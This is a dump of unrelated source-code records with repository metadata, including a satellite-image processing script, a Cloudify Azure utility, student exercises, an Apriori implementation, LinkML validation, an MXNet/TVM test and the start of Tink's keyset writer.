#gdal.Warp()
print(f"{geotiff} transformed to EPSG 32719.")
def crop_geotiff(): #Tested and works
'''Crops transformed geotiff to the study area boundary'''
for geotiff in os.listdir(outdir):
if geotiff.endswith("_utm_19S.tif"):
filename = str(geotiff)[:-4]
print(filename)
crop = f"gdalwarp -cutline {study_area} -crop_to_cutline {outdir}/{filename}.tif {outdir}/{filename}_cropped.tif"
os.system(crop)
print(f"{geotiff} cropped to study area.")
def move_surplus_files(): #Tested and works (also need to work on it so it deletes per S1 scene, rather than the whole folder, to ensure safety.)
'''Moves surplus files to other folder, from which they can then be deleted where necessary.
Should only run once the previous steps have been run on all of the geotiffs in the folder.'''
if any(File.endswith("_utm_19S_cropped.tif") for File in os.listdir(outdir)):
for geotiff in os.listdir(outdir):
if geotiff.endswith("geo_db.tif") or geotiff.endswith("_utm_19S.tif") or geotiff.endswith("geo.tif") or geotiff.endswith(".tif.ovr"):
os.rename(f"{outdir}/{geotiff}", f"{surplus_files}{geotiff}")
print(f"{geotiff} has been moved to the to_be_deleted folder.")
elif geotiff.endswith("_utm_19S_cropped.tif"):
print(f"{geotiff} is the final product (transformed and cropped).")
else:
print("The geotiff is yet to be cropped to the study area. Complete this step first, before removing the file from this folder.")
elif any(File.endswith("_utm_19S.tif") for File in os.listdir(outdir)):
for geotiff in os.listdir(outdir):
if geotiff.endswith("geo_db.tif"):
os.rename(f"{outdir}/{geotiff}", f"{surplus_files}{geotiff}")
#os.remove(geotiff)
elif geotiff.endswith("_utm_19S_cropped.tif"):
print(f"{geotiff} is the final product (transformed and cropped).")
else:
print(f"{geotiff} is yet to be transformed into UTM Zone 19S. Complete this step first, before removing the file from this folder.")
else:
print("No surplus files exist in this directory.")
'''Run the functions below. Comment out ("hash out") any that are not needed for the current run.'''
#data preparation steps
unzip()
mk_POEORB_dir()
downloadOSV()
#data processing steps, transformation, crop, and move surplus files
processGRD()
transform_geotiff()
crop_geotiff()
move_surplus_files()
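# Added note (not part of the original script): before running, the paths
# defined at the top (rootdir containing the Sentinel-1 *.zip scenes, dem and
# dem_par, the study_area shapefile, outdir and surplus_files) must all exist,
# and the GAMMA programs invoked through os.system() (par_S1_GRD, S1_OPOD_vec,
# multi_look_MLI, gc_map, pixel_area, product, geocode_back, sigma2gamma,
# linear_to_dB, data2geotiff) as well as gdalwarp and unzip must be on PATH.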
| [
"[email protected]"
] | |
4f714d6172a078dceda6b04a5faec6a75aeec621 | dc63e528012fb2f3e15b73e05c924236760d01b1 | /cloudify_azure/resources/compute/virtualmachine/virtualmachine_utils.py | 4a67d65a4df9ff6e52f6dd881668444d4f9e6848 | [
"Apache-2.0"
] | permissive | cloudify-cosmo/cloudify-azure-plugin | 515b6285b63c2a01ae4d666957541a1f08472410 | 361c48bc4abe38cf57354e8d36839137462ad345 | refs/heads/master | 2023-08-21T14:23:06.673284 | 2023-07-30T10:44:39 | 2023-07-30T10:44:39 | 36,666,947 | 4 | 14 | Apache-2.0 | 2023-07-30T10:44:41 | 2015-06-01T14:42:32 | Python | UTF-8 | Python | false | false | 3,521 | py | # #######
# Copyright (c) 2016-2020 Cloudify Platform Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from cloudify import ctx
def check_if_configuration_changed(ctx, update_payload, current_vm):
for prop in ['location', 'tags', 'plan', 'availability_set',
'eviction_policy', 'billing_profile', 'priority',
'hardware_profile']:
update_property_value = update_payload.get(prop)
current_vm_property_value = current_vm.get(prop)
if update_property_value and ordered(
update_property_value) != ordered(current_vm_property_value):
ctx.logger.info("{prop} changed.".format(prop=prop))
ctx.logger.info("update payload: {content}.".format(
content=update_property_value))
ctx.logger.info("current configuration: {content}.".format(
content=current_vm_property_value))
return True
for prop in ['os_profile', 'storage_profile', 'network_profile']:
if prop == 'network_profile' and update_payload.get(prop):
update_property_value = update_payload.get(prop).as_dict()
else:
update_property_value = update_payload.get(prop, {})
current_vm_property_value = current_vm.get(prop, {})
if diff_dictionaries(update_property_value, current_vm_property_value):
ctx.logger.info("{prop} changed.".format(prop=prop))
return True
return False
def diff_dictionaries(update_dict, current_conf_dict):
"""
Returns True if update_dict has changes in a key that doesn't appear in
current_conf_dict.
    current_conf_dict can have additional keys; that is not considered a
    diff.
"""
for key in update_dict:
if isinstance(update_dict.get(key), dict):
res = diff_dictionaries(update_dict.get(key),
current_conf_dict.get(key, {}))
if res:
return True
elif ordered(update_dict.get(key)) != ordered(
current_conf_dict.get(key)):
ctx.logger.info(
'Changes found in diff_dictionaries: key={key}\n'.format(
key=key))
ctx.logger.info(
'update_dict: {}'.format(ordered(update_dict.get(key))))
ctx.logger.info(
'current_conf_dict: {}'.format(ordered(
current_conf_dict.get(key))))
return True
return False
def ordered(obj):
"""
This function will recursively sort any lists it finds
(and convert dictionaries to lists of (key, value) pairs so that they're
orderable)
"""
if isinstance(obj, dict):
return sorted((k, ordered(v)) for k, v in obj.items())
if isinstance(obj, list):
return sorted(ordered(x) for x in obj)
if isinstance(obj, str):
return obj.lower()
if isinstance(obj, (int, float)):
return str(obj)
else:
return obj
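# Added example (not part of the plugin): ordered() normalises nested
# structures so that dictionaries differing only in key order or string-value
# case compare equal. Run standalone only if the cloudify import above resolves.
if __name__ == '__main__':
    a = {'tags': {'env': 'Prod'}, 'location': 'EastUS'}
    b = {'location': 'eastus', 'tags': {'env': 'prod'}}
    assert ordered(a) == ordered(b)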
| [
"[email protected]"
] | |
8eb20a63cf9ae7debe25c9b008d788862e5ee7da | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/78/usersdata/171/41777/submittedfiles/divisores.py | 701949f8b9cb8bf36079078eda939d27b7fe7166 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 191 | py | # -*- coding: utf-8 -*-
import math
n=int(input('digite n:'))
a=int(input('digite a:'))
b=int(input('digite b:'))
d=a
e=b
f=a*b
for i in range(1,n+1,1):
d=a
e=b
f=a*b
print(f) | [
"[email protected]"
] | |
ecf2e202398d9c58d9d5bcb9846dbebaf58a02aa | 0ccab2965458454d6a4802b47d33310e43c10d8f | /classes/student.py | c9e7d33683deae9b858dc5fb04d7034fd00d39ca | [] | no_license | jazib-mahmood-attainu/Ambedkar_Batch | 11e66125647b3b348d4567862f8fc20a3457b2f0 | c99be9a401b8d00f6ca47398f48e90ead98f4898 | refs/heads/main | 2023-08-01T13:13:43.357769 | 2021-09-25T03:54:27 | 2021-09-25T03:54:27 | 390,405,238 | 16 | 10 | null | null | null | null | UTF-8 | Python | false | false | 427 | py | class Student:
def __init__(self,roll,name,age):
self.roll = roll
self.name = name
self.age = age
def reads(self):
print(self.name,"is reading")
preeti = Student(10,"Preeti",24)
print(preeti.name)
print(preeti.roll)
print(preeti.age)
preeti.reads()
print("**********")
sapna = Student(11,"Sapna",19)
print(sapna.name)
print(sapna.roll)
print(sapna.age)
sapna.reads()
| [
"[email protected]"
] | |
e2230aed752c8a73948aecc725580d22f370446b | 1e9fed88ce4a623970f7e53143753a170d4bdcda | /aat/tests/test_strategy.py | 37e4f8123735a0e70663ec060bc26eda308854e1 | [
"Apache-2.0"
] | permissive | krusty45/aat | 06dedbfe0abaf76c4a584ad441dc7badd093a939 | a14b652f7ff90761d0e1198a85d8fc02efeff0eb | refs/heads/master | 2020-06-24T09:34:30.981326 | 2019-07-09T19:34:22 | 2019-07-09T19:34:22 | 198,929,483 | 1 | 0 | Apache-2.0 | 2019-07-26T02:07:57 | 2019-07-26T02:07:56 | null | UTF-8 | Python | false | false | 453 | py | # for coverage
from ..strategy import *
class TestStrategy:
def setup(self):
pass
# setup() before each test method
def teardown(self):
pass
# teardown() after each test method
@classmethod
def setup_class(cls):
pass
# setup_class() before any methods in this class
@classmethod
def teardown_class(cls):
pass
# teardown_class() after any methods in this class
| [
"[email protected]"
] | |
8806780712e5054373bdc136bb537dece0d2b9ac | ffd2126e1ba5d1acea0bb0b3d011f4ccaf1c1f1f | /gia/gia/doctype/gia_sector/gia_sector.py | 4a1e4524728a0939102446bd86307c02279f077f | [
"MIT"
] | permissive | alkuhlani/gia | fd55c65b0f430f24c7fbe3aef5ea911af8642702 | 9af9737cef7b0b947baa21f46c7be381c4fc9d98 | refs/heads/master | 2022-12-10T02:45:47.907158 | 2020-09-04T16:37:10 | 2020-09-04T16:37:10 | 276,495,714 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 392 | py | # -*- coding: utf-8 -*-
# Copyright (c) 2020, Ahmed Mohammed Alkuhlani and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe import _, throw
from frappe.model.document import Document
class GIASector(Document):
def validate(self):
if not self.parent_gia_sector:
frappe.throw(_("Please enter the parent"))
| [
"[email protected]"
] | |
fd9166714314627d931b92e8df033ea9d4f2ffd2 | 54a5f5ec2c5edf924b7dc7730ee7cb2a38ac4a39 | /DataFrame_manipulation_pandas/E01_Positional_and_labeled_indexing.py | aa09f4a045dbe19bc6a45b84a5dfebd5c0c513b2 | [] | no_license | dajofischer/Datacamp | fac413ec178375cedceababaf84f6b47a61fc821 | a03d16b8f342412f1ee077f2f196ee8404e2e21c | refs/heads/master | 2020-04-05T08:38:25.361746 | 2019-03-27T20:55:57 | 2019-03-27T20:55:57 | 156,722,561 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 247 | py | # Assign the row position of election.loc['Bedford']: x
x = 4
# Assign the column position of election['winner']: y
y = 4
# Print the boolean equivalence
print(election.iloc[x, y] == election.loc['Bedford', 'winner'])
| [
"[email protected]"
] | |
e33e3af781a4af593bf78acc8dc4120f93f12313 | e3365bc8fa7da2753c248c2b8a5c5e16aef84d9f | /indices/wellf.py | 01d938845a41da448d3678520087a53125ba2d11 | [] | no_license | psdh/WhatsintheVector | e8aabacc054a88b4cb25303548980af9a10c12a8 | a24168d068d9c69dc7a0fd13f606c080ae82e2a6 | refs/heads/master | 2021-01-25T10:34:22.651619 | 2015-09-23T11:54:06 | 2015-09-23T11:54:06 | 42,749,205 | 2 | 3 | null | 2015-09-23T11:54:07 | 2015-09-18T22:06:38 | Python | UTF-8 | Python | false | false | 141 | py | ii = [('RoscTTI3.py', 1), ('MedwTAI.py', 1), ('WadeJEB.py', 2), ('DibdTRL.py', 1), ('FitzRNS2.py', 1), ('HogaGMM2.py', 1), ('BeckWRE.py', 1)] | [
"[email protected]"
] | |
5651d66b1dd3f7adb98ce5c7bc17e2acfe92784a | 174620e5937ac217cfdc46fa1f58493e9d59dfdd | /lib/default/lib/python2.7/site-packages/celery/concurrency/base.py | e0f2eb514c23941ee91fd0003917de8230cc1dac | [] | no_license | Saifinbox/CKANPROJECT | 6552912317019ce7dca87a1367344dbf5d978062 | 89e1cac49b282106ff4595f54a4eb84bcc8d2ee9 | refs/heads/master | 2021-01-01T06:34:37.568829 | 2017-07-17T08:48:46 | 2017-07-17T08:48:46 | 97,453,740 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,732 | py | # -*- coding: utf-8 -*-
"""
celery.concurrency.base
~~~~~~~~~~~~~~~~~~~~~~~
TaskPool interface.
"""
from __future__ import absolute_import
import logging
import os
import time
from kombu.utils.encoding import safe_repr
from celery.utils import timer2
from celery.utils.log import get_logger
logger = get_logger('celery.concurrency')
def apply_target(target, args=(), kwargs={}, callback=None,
accept_callback=None, pid=None, **_):
if accept_callback:
accept_callback(pid or os.getpid(), time.time())
callback(target(*args, **kwargs))
class BasePool(object):
RUN = 0x1
CLOSE = 0x2
TERMINATE = 0x3
Timer = timer2.Timer
#: set to true if the pool can be shutdown from within
#: a signal handler.
signal_safe = True
#: set to true if pool supports rate limits.
#: (this is here for gevent, which currently does not implement
#: the necessary timers).
rlimit_safe = True
#: set to true if pool requires the use of a mediator
#: thread (e.g. if applying new items can block the current thread).
requires_mediator = False
#: set to true if pool uses greenlets.
is_green = False
_state = None
_pool = None
#: only used by multiprocessing pool
uses_semaphore = False
def __init__(self, limit=None, putlocks=True, forking_enable=True,
**options):
self.limit = limit
self.putlocks = putlocks
self.options = options
self.forking_enable = forking_enable
self._does_debug = logger.isEnabledFor(logging.DEBUG)
def on_start(self):
pass
def did_start_ok(self):
return True
def on_stop(self):
pass
def on_apply(self, *args, **kwargs):
pass
def on_terminate(self):
pass
def on_soft_timeout(self, job):
pass
def on_hard_timeout(self, job):
pass
def maybe_handle_result(self, *args):
pass
def maintain_pool(self, *args, **kwargs):
pass
def terminate_job(self, pid):
raise NotImplementedError(
'%s does not implement kill_job' % (self.__class__, ))
def restart(self):
raise NotImplementedError(
'%s does not implement restart' % (self.__class__, ))
def stop(self):
self.on_stop()
self._state = self.TERMINATE
def terminate(self):
self._state = self.TERMINATE
self.on_terminate()
def start(self):
self.on_start()
self._state = self.RUN
def close(self):
self._state = self.CLOSE
self.on_close()
def on_close(self):
pass
def init_callbacks(self, **kwargs):
pass
def apply_async(self, target, args=[], kwargs={}, **options):
"""Equivalent of the :func:`apply` built-in function.
Callbacks should optimally return as soon as possible since
otherwise the thread which handles the result will get blocked.
"""
if self._does_debug:
logger.debug('TaskPool: Apply %s (args:%s kwargs:%s)',
target, safe_repr(args), safe_repr(kwargs))
return self.on_apply(target, args, kwargs,
waitforslot=self.putlocks,
**options)
def _get_info(self):
return {}
@property
def info(self):
return self._get_info()
@property
def active(self):
return self._state == self.RUN
@property
def num_processes(self):
return self.limit
@property
def readers(self):
return {}
@property
def writers(self):
return {}
@property
def timers(self):
return {}
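# Illustrative subclass (added; not part of Celery itself): the smallest
# possible pool runs every job inline in the calling thread via apply_target
# above -- celery's bundled "solo" pool works essentially this way. Real
# pools (processes, eventlet, gevent, threads) override far more of the
# interface (start/stop, maintain_pool, num_processes, ...).
class InlineExamplePool(BasePool):

    def on_apply(self, target, args=None, kwargs=None, callback=None,
                 accept_callback=None, **options):
        # The worker always supplies callback/accept_callback when it applies
        # a task, so the result is fed straight back synchronously.
        apply_target(target, args or (), kwargs or {},
                     callback=callback, accept_callback=accept_callback)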
| [
"[email protected]"
] | |
42170e9a6ac498033863cd27ca0a6556bf1aa6c3 | 53dd5d2cfb79edc87f6c606bbfb7d0bedcf6da61 | /.history/EMR/apriori_20190422135150.py | 36ae75953708f032ec4b5b046220fb616cdb0b75 | [] | no_license | cyc19950621/python | 4add54894dc81187211aa8d45e5115903b69a182 | d184b83e73334a37d413306d3694e14a19580cb0 | refs/heads/master | 2020-04-11T20:39:34.641303 | 2019-07-02T12:54:49 | 2019-07-02T12:54:49 | 162,078,640 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,768 | py | # Apriori算法
"""
Because the Apriori algorithm assumes the items inside an itemset are sorted lexicographically while Python sets are unordered, we convert between set and list where necessary;
because a dictionary (support_data) keyed by itemsets records each itemset's support, and mutable sets cannot be dictionary keys, itemsets are converted to frozenset at the appropriate points.
Support
Confidence
"""
class apriori_algorithm:
    # initialize with the minimum support threshold and the transaction data set
def __init__(self, minSupport, dataSet):
        self.minSupport = minSupport  # minimum support threshold
        self.dataSet = dataSet  # transaction data set
    # build the list of candidate 1-item itemsets
def generateC1(self, dataSet):
        C1 = []  # holds the generated single-item itemsets
        # scan every transaction in the data set
for data in dataSet:
for item in data:
if [item] not in C1:
C1.append([item])
C1.sort()
return C1
    # scan the data set, compare against Ck and count occurrences of each candidate
def generateLk_by_Ck(self, dataSet, Ck, minSupport, support_data):
"""
Generate Lk by executing a delete policy from Ck.
Args:
            data_set: the transaction data set
            Ck: A set which contains all frequent candidate k-itemsets.
            min_support: The minimum support.
            support_data: A dictionary. The key is frequent itemset and the value is support.
        Returns:
            Lk: A set which contains all frequent k-itemsets.
"""
D = map(set, dataSet)
C = map(frozenset, Ck)
        C1 = list(C)  # a map object is an iterator: once the inner loop exhausts it, later passes would see it empty, so materialise it as a list first
countData = dict()
        for d in D:  # iterate over the transactions (as sets)
for c in C1:
                if c.issubset(d):  # subset test, not element membership
                    if c not in countData.keys():  # the frozenset itself is used as the dictionary key
countData[c] = 1
else:
countData[c] += 1
numItems = float(len(list(dataSet)))
returnList = []
supportData = dict()
        # walk over the count dictionary built above
for key in countData:
support = countData[key] / numItems
if support >= minSupport:
                returnList.insert(0, key)  # insert() places the itemset at the front of the list
support_data[key] = support
return returnList
def generate_L(self, dataSet, k, min_support):
"""
Generate all frequent itemsets.
Args:
            data_set: the transaction data set
            k: maximum number of items in a frequent itemset
            min_support: the minimum support
        Returns:
            L: all frequent itemsets that occur
            support_data: the support of each frequent itemset
"""
support_data = {}
C1 = self.generateC1(dataSet)
L1 = self.generateLk_by_Ck(dataSet, C1, min_support, support_data)
Lksub1 = L1.copy()
L = []
L.append(Lksub1)
for i in range(2, k + 1):
Ci = self.generateCK(Lksub1, i)
Li = self.generateLk_by_Ck(dataSet, Ci, min_support, support_data)
Lksub1 = Li.copy()
L.append(Lksub1)
return L, support_data
    # generateCK: build candidate k-itemsets. Parameters: Lk -- the frequent (k-1)-itemsets, k -- number of items per candidate set
def generateCK(self, Lk, k):
Ck = set()
len_Lk = len(list(Lk))
list_Lk = list(Lk)
for i in range(len_Lk):
for j in range(1, len_Lk):
l1 = list(list_Lk[i])
l2 = list(list_Lk[j])
l1.sort()
l2.sort()
if l1[0:k - 2] == l2[0:k - 2]:
Ck_item = list_Lk[i] | list_Lk[j]
if self.isCk(Ck_item, list_Lk):
Ck.add(Ck_item)
# Ck.add(Ck_item)
return Ck
    # apriori pruning: a candidate can only be frequent if all of its (k-1)-subsets are frequent
def isCk(self, Ck_item, list_Lk):
for item in Ck_item:
sub_Ck = Ck_item - frozenset([item])
if sub_Ck not in list_Lk:
return False
return True
    # generate association rules from the frequent itemsets
def generate_big_rules(self, L, support_data, min_conf):
"""
Generate big rules from frequent itemsets.
Args:
            L: the list of all frequent itemsets
            support_data: the support of each frequent itemset
            min_conf: the minimum confidence
"""
big_rule_list = []
sub_set_list = []
for i in range(0, len(L)):
for freq_set in L[i]:
for sub_set in sub_set_list:
if sub_set.issubset(freq_set):
conf = support_data[freq_set] / support_data[freq_set - sub_set]
big_rule = (freq_set - sub_set, sub_set, conf)
if conf >= min_conf and big_rule not in big_rule_list:
print(freq_set - sub_set, " => ", sub_set, "conf: ", conf)
big_rule_list.append(big_rule)
sub_set_list.append(freq_set)
return big_rule_list
if __name__ == '__main__':
minS = 0.5
dataSet = [['这个','弄','鞍山', '挨打'], ['这个', '啊'], ['鞍山', '弄', '词典', '按错'], ['鞍山', '挨打','按下','爱玩']]
apriori = apriori_algorithm(minSupport=minS, dataSet=dataSet)
L, support_data = apriori.generate_L(dataSet, 1,minS)
print(L)
print(support_data)
big_rule_list = apriori.generate_big_rules(L, support_data, 0.5) | [
"[email protected]"
] | |
aa13bd841c98bf69edc143608a0dcaf19c026204 | 4cfbc12903651dedbc799f53a8078433196e7919 | /Pre Processing/Topic 7 - Kernal PCA/KERNEL_PCA_WITHOUT_SPLIT.py | 6974fa581f4052b61770920b3c784ba26c4341c3 | [] | no_license | gautam4941/Machine_Learning_Codes | 78bf86ab3caf6ee329c88ff18d25927125627a2c | 0009d12ca207a9b0431ea56decc293588eb447b1 | refs/heads/main | 2023-02-06T18:05:44.154641 | 2023-01-30T17:04:25 | 2023-01-30T17:04:25 | 353,594,523 | 0 | 5 | null | null | null | null | UTF-8 | Python | false | false | 1,398 | py | import pandas as pd
data = pd.read_csv('Social_Network_Ads.csv')
print( f"data :- \n{ data }\n" )
print( f"data.columns :- \n{ data.columns }\n" )
x = data.loc[ :, 'Gender' : 'EstimatedSalary' ]
y = data.loc[ :, 'Purchased' ]
print( f"x.isnull().sum() :- \n{ x.isnull().sum() }\n" )
print( f"y.isnull().sum() :- \n{ y.isnull().sum() }\n" )
print( f"x.dtypes :- \n{ x.dtypes }\n" )
print( f"y.dtypes :- \n{ y.dtypes }\n" )
from sklearn.preprocessing import LabelEncoder
le = LabelEncoder()
x['Gender'] = le.fit_transform( x['Gender'] )
import matplotlib.pyplot as plt
# plt.plot( x['Age'], x['EstimatedSalary'], linestyle = '', marker = '*' )
# plt.xlabel( 'Age' )
# plt.ylabel( 'EstimatedSalary' )
# plt.title( 'Age V/s Salary' )
# plt.show()
from sklearn.decomposition import KernelPCA
kpca = KernelPCA( n_components = 2, kernel = 'rbf' )  # n_components is the number of kernel principal components to keep (the transformed feature columns)
x = kpca.fit_transform( x )
print( f"After Kernal PCA, x :- \n{ x }\n" )
from sklearn.linear_model import LogisticRegression
lr = LogisticRegression()
lr.fit( x, y )
y_pred = lr.predict( x )
new_x_test = x.T
# plt.plot( x_test[0], x_test[1], linestyle = '', marker = '*' )
# plt.xlabel( 'Age' )
# plt.ylabel( 'EstimatedSalary' )
# plt.title( 'Age V/s Salary' )
# plt.show()
print( f"lr.score( x_test, y_test ) = { lr.score( x, y ) }" ) | [
"[email protected]"
] | |
9e8684300a753747f2ea81503addd0bd9141eee2 | 7ef5898dc861f7a5512953269db7b52d44f44bc5 | /linkml/utils/validation.py | 02ee97f62911680b3e797aa9db26dcd3bd75f727 | [
"CC0-1.0"
] | permissive | balhoff/linkml | eb5c26e9d8ace3c2a7a6f2f36872b9c2af7b97df | b27c36b24437f68878806518264f55f0f418cb0b | refs/heads/main | 2023-07-28T16:47:04.974232 | 2021-09-09T01:39:21 | 2021-09-09T01:39:21 | 404,550,589 | 0 | 0 | CC0-1.0 | 2021-09-09T01:45:37 | 2021-09-09T01:45:37 | null | UTF-8 | Python | false | false | 1,483 | py | import json
import sys
from typing import Type, Union, TextIO
import logging
import click
import jsonschema
from linkml_runtime.linkml_model import SchemaDefinition
from linkml_runtime.utils.yamlutils import as_dict, YAMLRoot
from linkml_runtime.dumpers import json_dumper
from linkml.generators.jsonschemagen import JsonSchemaGenerator
import linkml.utils.datautils as datautils
def _as_dict(inst):
# TODO: replace this with linkml_runtime.dictutils when 1.0.14 is released
inst_dict = json.loads(json_dumper.dumps(element=inst))
del inst_dict['@type']
return inst_dict
def validate_object(data: YAMLRoot, schema: Union[str, TextIO, SchemaDefinition], target_class: Type[YAMLRoot] = None,
closed: bool = True):
"""
validates instance data against a schema
    :param data: LinkML instance to be validated
:param schema: LinkML schema
:param target_class: class in schema to validate against
:param closed:
:return:
"""
if target_class is None:
target_class = type(data)
inst_dict = _as_dict(data)
not_closed = not closed
jsonschemastr = JsonSchemaGenerator(schema, mergeimports=True, top_class=target_class.class_name,
not_closed=not_closed).serialize(not_closed=not_closed)
jsonschema_obj = json.loads(jsonschemastr)
return jsonschema.validate(inst_dict, schema=jsonschema_obj)
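# Added usage sketch (illustrative; `Person` and the schema path are
# placeholders for a generated LinkML class and its source schema):
#
#   from my_generated_model import Person
#   p = Person(id='P:1', name='Alice')
#   validate_object(p, schema='personinfo.yaml')
#
# As with jsonschema.validate, the call returns None when the instance is
# valid and raises jsonschema.ValidationError otherwise.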
if __name__ == '__main__':
datautils.cli(sys.argv[1:]) | [
"[email protected]"
] | |
9954328c0d050bb4d64a911f7461a367bf36a59f | 8c50265b43add0e91e30245cc7af3c2558c248f5 | /tests/python/gpu/test_tvm_bridge.py | 5c87536bdbaea32571012424a4db77dab00c19ed | [
"BSD-3-Clause",
"BSD-2-Clause-Views",
"Zlib",
"Apache-2.0",
"BSD-2-Clause",
"Intel"
] | permissive | awslabs/dynamic-training-with-apache-mxnet-on-aws | 6a67f35d7e4b12fa8bba628bd03b2b031924e211 | 1063a979417fee8c820af73860eebd2a4f670380 | refs/heads/master | 2023-08-15T11:22:36.922245 | 2022-07-06T22:44:39 | 2022-07-06T22:44:39 | 157,440,687 | 60 | 19 | Apache-2.0 | 2022-11-25T22:23:19 | 2018-11-13T20:17:09 | Python | UTF-8 | Python | false | false | 2,440 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Test TVM bridge, only enable this when TVM is available"""
import logging
import mxnet as mx
import numpy as np
import unittest
def test_tvm_bridge():
# only enable test if TVM is available
try:
import tvm
import tvm.contrib.mxnet
import topi
except ImportError:
logging.warn("TVM bridge test skipped because TVM is missing...")
return
def check(target, dtype):
shape = (20,)
scale = tvm.var("scale", dtype="float32")
x = tvm.placeholder(shape, dtype=dtype)
y = tvm.placeholder(shape, dtype=dtype)
z = tvm.compute(shape, lambda i: x[i] + y[i])
zz = tvm.compute(shape, lambda *i: z(*i) * scale.astype(dtype))
ctx = mx.gpu(0) if target == "cuda" else mx.cpu(0)
target = tvm.target.create(target)
# build the function
with target:
s = topi.generic.schedule_injective(zz)
f = tvm.build(s, [x, y, zz, scale])
# get a mxnet version
mxf = tvm.contrib.mxnet.to_mxnet_func(f, const_loc=[0, 1])
xx = mx.nd.uniform(shape=shape, ctx=ctx).astype(dtype)
yy = mx.nd.uniform(shape=shape, ctx=ctx).astype(dtype)
zz = mx.nd.empty(shape=shape, ctx=ctx).astype(dtype)
# invoke myf: this runs in mxnet engine
mxf(xx, yy, zz, 10.0)
np.testing.assert_allclose(
zz.asnumpy(), (xx.asnumpy() + yy.asnumpy()) * 10)
for tgt in ["llvm", "cuda"]:
for dtype in ["int8", "uint8", "int64",
"float32", "float64"]:
check(tgt, dtype)
if __name__ == "__main__":
import nose
nose.runmodule()
| [
"[email protected]"
] | |
6508b6eae18f254c28dd6343bef32cd4b4afd295 | 61fa932822d22ba480f7aa075573e688897ad844 | /simulation/decai/simulation/data/imdb_data_loader.py | fbc6d62dc1165cc5a608c3003156977db751c917 | [
"MIT",
"LicenseRef-scancode-generic-cla"
] | permissive | microsoft/0xDeCA10B | a8f118fa1f89f387a0b83f297250fc1846521f41 | 4066eeb2b5298c259a7c19c4d42ca35ef22e0569 | refs/heads/main | 2023-07-26T08:09:34.718104 | 2023-01-25T12:47:17 | 2023-01-25T12:47:17 | 181,561,897 | 538 | 133 | MIT | 2023-07-19T03:10:38 | 2019-04-15T20:37:11 | Python | UTF-8 | Python | false | false | 1,778 | py | from dataclasses import dataclass, field
from logging import Logger
from typing import List
import numpy as np
from injector import ClassAssistedBuilder, Module, inject, provider, singleton
from keras.datasets import imdb
from .data_loader import DataLoader
@inject
@dataclass
class ImdbDataLoader(DataLoader):
"""
Load data for sentiment analysis of IMDB reviews.
https://keras.io/datasets/#imdb-movie-reviews-sentiment-classification
"""
_logger: Logger
num_words: int = field(default=1000)
def classifications(self) -> List[str]:
return ["NEGATIVE", "POSITIVE"]
def load_data(self, train_size: int = None, test_size: int = None) -> (tuple, tuple):
self._logger.info("Loading IMDB review data using %d words.", self.num_words)
(x_train, y_train), (x_test, y_test) = imdb.load_data(num_words=self.num_words)
if train_size is not None:
x_train, y_train = x_train[:train_size], y_train[:train_size]
if test_size is not None:
x_test, y_test = x_test[:test_size], y_test[:test_size]
def get_features(data):
result = np.zeros((len(data), self.num_words), dtype='int')
for i, x in enumerate(data):
for v in x:
result[i, v] = 1
return result
x_train = get_features(x_train)
x_test = get_features(x_test)
self._logger.info("Done loading IMDB review data.")
return (x_train, y_train), (x_test, y_test)
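# Worked example of the multi-hot encoding performed by get_features above (illustrative,
# not from the original file): with num_words = 5, a review given as word indices [1, 3, 3]
# becomes the row [0, 1, 0, 1, 0] -- each column records only whether that word id occurs,
# so repeated indices do not change the encoding.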
@dataclass
class ImdbDataModule(Module):
num_words: int = field(default=1000)
@provider
@singleton
def provide_data_loader(self, builder: ClassAssistedBuilder[ImdbDataLoader]) -> DataLoader:
return builder.build(num_words=self.num_words)
| [
"[email protected]"
] | |
587af0a9afab30d6dbe975f04b48b2543833db22 | 51507929d5bf732e6e5b7085015b86d097fc404d | /python/core/keyset_writer.py | 4e417f4417071723ba236115a738874609d779e8 | [
"Apache-2.0"
] | permissive | jojodeco2/tink | a77be3fd6958070c131f4d556b349b69b65e11cb | 46d4d5d6ff09f594c5460216c5b2cb11486076db | refs/heads/master | 2020-08-04T04:46:05.526255 | 2019-10-01T10:21:02 | 2019-10-01T10:21:02 | 212,011,212 | 0 | 0 | Apache-2.0 | 2019-10-01T04:18:08 | 2019-10-01T04:18:08 | null | UTF-8 | Python | false | false | 3,498 | py | # Copyright 2019 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Writes Keysets to file."""
from __future__ import absolute_import
from __future__ import division
from __future__ import google_type_annotations
from __future__ import print_function
import abc
import io
from google.protobuf import json_format
from tink.proto import tink_pb2
from tink.python.core import tink_error
class KeysetWriter(object):
"""Knows how to write keysets to some storage system."""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
